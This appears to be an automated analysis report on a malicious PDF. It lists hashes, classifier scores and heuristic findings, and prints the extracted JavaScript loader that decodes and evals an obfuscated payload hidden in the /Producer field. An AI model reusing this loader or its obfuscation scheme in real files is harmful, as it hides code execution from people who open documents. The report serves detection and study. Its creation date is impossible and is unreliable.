PDF malware analysis — malicious · 3d492459b800ec5b

MALICIOUS

PDF

25.1 KB Created: 2011-72-51 03:25:00 First seen: 2026-05-09

MD5: a779ea1f08c68b3b605d2f3fc87ef813 SHA-1: 1cd56df71e238bd66aa3ac2131df50b699aaa92d SHA-256: 3d492459b800ec5b0f86e8e3790afdd542004786e8499b30b02ad4ffdd563f1a

114 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell

The PDF was flagged as malicious by an ML classifier with very high confidence. Static analysis revealed embedded JavaScript, specifically using String.fromCharCode, which is a common obfuscation technique. The JavaScript stream itself was extracted, indicating it likely contains malicious code. The primary function of this script is presumed to be the download and execution of a second-stage payload.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 3

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.

Matched line in script

/Producer (String.fromCharCodet9.5*wqt4.t5*wqt8.5*wq8*wqt4.5*wqt6.5*wqt8.75*wqt5.75*wq15.t5*wq9.75*wq9.t5*wqt9.t5*wq14.t5*wq1t*wq14.t5*wq1t*wq9.t5*wqt9.t5*wq14.t5*wq1t*wq14.t5*wq1t*wq9.t5*wqt9.t5*wq1t.t5*wq13.5*wqt5.t5*wqt4.5*wq9.t5*wqt9.t5*wq1t.75*wq13.75*wqt4.5*wq14.t5*wq9.t5*wqt9.t5*wq1t*wq1t*wq1t*wq1t.t5*wq9.t5*wqt9.t5*wq14*wqt4.5*wq1t*wq1t*wq9.t5*wqt9.t5*wq1t.5*wq13*wq1t.75*wq13*wq9.t5*wqt9.t5*wqt5.5*wq13.75*wq14*wq14.t5*wq9.t5*wqt9.t5*wq1t.75*wqt5.t5*wq14*wq1t*wq9.t5*wqt9.t5*wq13.75*wq13*w …

Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0001_000.js pdf-javascript-stream PDF /JS object 1 at offset 0x624A 371 bytes

Filename	Kind	Source	Size
`javascript_obj0001_000.js`	pdf-javascript-stream	PDF /JS object 1 at offset 0x624A	371 bytes
SHA-256: `1f639f77107394476fcbc6c84532ac66ba53b2cce977aa9b2ed2b34d8523d73d`
Preview script First 1,000 lines of the extracted script var qweval=5; for(var i in this) { if (i.indexOf('qwe') != -1) { pdoe=this[i.replace('qw','')]; } } pdoe('hwrgj=this.producer'); pxjae=pdoe(hwrgj.substr(0,19)); hwrgj = hwrgj.substr(19); hwrgj = hwrgj.replace(/t/g,'2'); ar = hwrgj.split('q'); var s = ''; w = 4; for (i = 0; i < ar.length; i++) { rqin = pdoe(ar[i]); s += pxjae(rqin); } pdoe(s);

SHA-256: 1f639f77107394476fcbc6c84532ac66ba53b2cce977aa9b2ed2b34d8523d73d

Preview script

First 1,000 lines of the extracted script

var qweval=5;
for(var i in this) {
	if (i.indexOf('qwe') != -1) {
		pdoe=this[i.replace('qw','')];
	}
}
pdoe('hwrgj=this.producer');
pxjae=pdoe(hwrgj.substr(0,19));
hwrgj = hwrgj.substr(19);
hwrgj = hwrgj.replace(/t/g,'2');
ar = hwrgj.split('q');
var s = '';
w = 4;
for (i = 0; i < ar.length; i++) {
	rqin = pdoe(ar[i]);
	s += pxjae(rqin);
}
pdoe(s);

Open this report in the interactive analyzer, or submit your own file for analysis.